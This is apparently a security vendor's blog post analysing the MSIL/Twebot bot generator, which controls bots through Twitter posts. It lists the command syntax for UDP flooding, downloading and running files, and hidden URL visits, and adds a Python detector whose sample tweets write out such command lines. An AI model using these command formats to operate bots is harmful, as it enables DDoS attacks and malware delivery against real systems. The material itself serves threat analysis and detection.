Mobile admin, or Twitter as a command center

Managing botnets from a mobile phone has long been a reality: we have already seen botnets controlled over Jabber, and a few years ago the IRC protocol was very popular with cybercriminals for this purpose. Last week we came across the curious MSIL/Twebot.A bot generator, which "binds" the bots it produces to a command center in the form of a Twitter account, through which all botnet management is carried out.


Update:
Added a description of MSIL/Twebot.B.


Controlling a botnet via Twitter is not a new idea; it was already demonstrated as a proof of concept last summer. In the present case, however, the authors went further and developed it into something more. The set of control commands is quite diverse:

.VISIT (.VISIT * link.com *) - visits the specified URL. If the trailing flag is 1, the browser window is visible; if it is 0, the window is hidden.
.DDOS (.DDOS * IP * PORT) - performs a UDP flood against the specified address and port.
.SAY (.SAY * any text) - speaks the specified phrase on the controlled computer using the Microsoft Text-To-Speech engine.
.DOWNLOAD (.DOWNLOAD * link.com / malware.exe *) - downloads the file at the specified URL. If the trailing flag is 1, the file is also run; if it is 0, the file is downloaded but not started.
.STOP - stops the bots' activity regardless of their current tasks.
.REMOVEALL - forces the bots to stop all activity and not contact the command center again until the next reboot.
The bot generator is written in Visual Basic .NET and requires the .NET Framework to be installed in order to run.

To hinder reverse engineering, both the bot generator and the bots it produces are obfuscated.

The resource section of the bot generator contains information identifying the author's alias, Korrupt.

Even more interesting is that every generated bot also contains a hard-coded @Korrupt account, which can control the bots in addition to whatever command centers were specified at generation time.
At the moment the bot can only be bound to public Twitter accounts, which can be found through the standard search interface. Since the commands are not disguised in any way, they are easy to spot.
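Because the commands listed above are posted in clear text on public accounts, a defender can match them with a small parser. The following is an added example and not code from the post or from the malware: it reconstructs the command grammar described above and runs it over a constructed sample timeline. The asterisk delimiters, the trailing 0/1 flag for .VISIT and .DOWNLOAD, and the port as the last token of .DDOS are assumptions drawn from the post's notation; the severity labels are a triage choice made for this example. Only tweets that begin with a command keyword are reported, so ordinary text that happens to contain ".STOP" is not flagged.

```python
import re
from typing import Optional

# Command grammar reconstructed from the post's description of MSIL/Twebot.A.
# Delimiter handling is an assumption: the post writes arguments as
# "* link.com *", so *...* is treated as the argument wrapper and the
# trailing number (0/1 flag for VISIT/DOWNLOAD, port for DDOS) as the last token.
COMMAND_RE = re.compile(
    r"^\s*\.(?P<cmd>VISIT|DDOS|SAY|DOWNLOAD|STOP|REMOVEALL)\b(?P<rest>.*)$",
    re.IGNORECASE | re.DOTALL,
)

# Triage labels chosen for this example; they are not part of the malware.
SEVERITY = {
    "DDOS": "high",
    "DOWNLOAD": "high",
    "VISIT": "medium",
    "SAY": "low",
    "STOP": "info",
    "REMOVEALL": "info",
}


def _starred_args(rest: str) -> list[str]:
    """Return every *...* group in the argument tail, whitespace-trimmed."""
    return [a.strip() for a in re.findall(r"\*([^*]*)\*", rest)]


def _trailing_int(rest: str) -> Optional[int]:
    """Return the integer that closes the argument tail, if there is one."""
    m = re.search(r"(?<![\w.])(\d+)\s*$", rest)
    return int(m.group(1)) if m else None


def parse_command(text: str) -> Optional[dict]:
    """Return a structured record if `text` is a Twebot-style command, else None.

    Only text that starts with a command keyword counts, so a tweet that merely
    mentions ".STOP" somewhere in the middle is not reported.
    """
    m = COMMAND_RE.match(text)
    if m is None:
        return None
    cmd = m.group("cmd").upper()
    rest = m.group("rest")
    args = _starred_args(rest)
    tail = _trailing_int(rest)
    rec = {"command": cmd, "severity": SEVERITY[cmd], "raw": text.strip()}

    if cmd in ("VISIT", "DOWNLOAD"):
        rec["url"] = args[0] if args else None
        # Per the post: trailing 1 = visible window / run the file, 0 = not.
        flag = tail if tail in (0, 1) else None
        rec["flag"] = flag
        rec["visible_window" if cmd == "VISIT" else "execute"] = flag == 1
    elif cmd == "DDOS":
        rec["target"] = args[0] if args else None
        rec["port"] = tail if tail is not None and 0 <= tail <= 65535 else None
    elif cmd == "SAY":
        # Everything after the first asterisk is the phrase to be spoken.
        rec["text"] = rest.split("*", 1)[1].strip() if "*" in rest else rest.strip()
    return rec


def scan_timeline(tweets: list[dict]) -> list[dict]:
    """Run parse_command over {"user", "text"} records and return the hits."""
    hits = []
    for tw in tweets:
        rec = parse_command(tw["text"])
        if rec is not None:
            rec["user"] = tw["user"]
            hits.append(rec)
    return hits


# Constructed sample timeline (not real tweets). The last two lines are
# benign text that mentions command keywords without leading with them.
SAMPLE_TIMELINE = [
    {"user": "example_c2", "text": ".VISIT *http://example.invalid/landing* 0"},
    {"user": "example_c2", "text": ".DDOS *192.0.2.10* 53"},
    {"user": "example_c2", "text": ".DOWNLOAD *http://example.invalid/update.exe* 1"},
    {"user": "example_c2", "text": ".REMOVEALL"},
    {"user": "example_c2", "text": ".SAY * hello from the command center"},
    {"user": "bystander", "text": "Lunch at the .STOP cafe was great"},
    {"user": "bystander", "text": "new .NET release, .DOWNLOAD it later"},
]

if __name__ == "__main__":
    for h in scan_timeline(SAMPLE_TIMELINE):
        print(f"[{h['severity']:>6}] @{h['user']}: {h['command']} {h['raw']}")
```

In practice the records returned by scan_timeline would be fed to an alerting pipeline keyed on the posting account, since the post notes that every bot also answers to the hard-coded @Korrupt account: a hit from a previously unknown account is as interesting as the command itself.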

For now this is still something of a proof of concept, but one with clearly harmful potential. This approach to botnet management is convenient for attackers for many reasons, chief among them that the bot can be disguised as a Twitter client and that the operator can issue commands from anywhere, including a mobile phone.

Update:
Last night we received a new variant of this Trojan, MSIL/Twebot.B. This time the author added a license agreement that is displayed before the bot generator starts, in which he makes it clear that the user is looking at a proof of concept and that the developer is not responsible for how it is used.

The author has also substantially redesigned the bot generator's graphical interface. Many more of the parameters governing the interaction between the command center and the bot itself can now be changed.
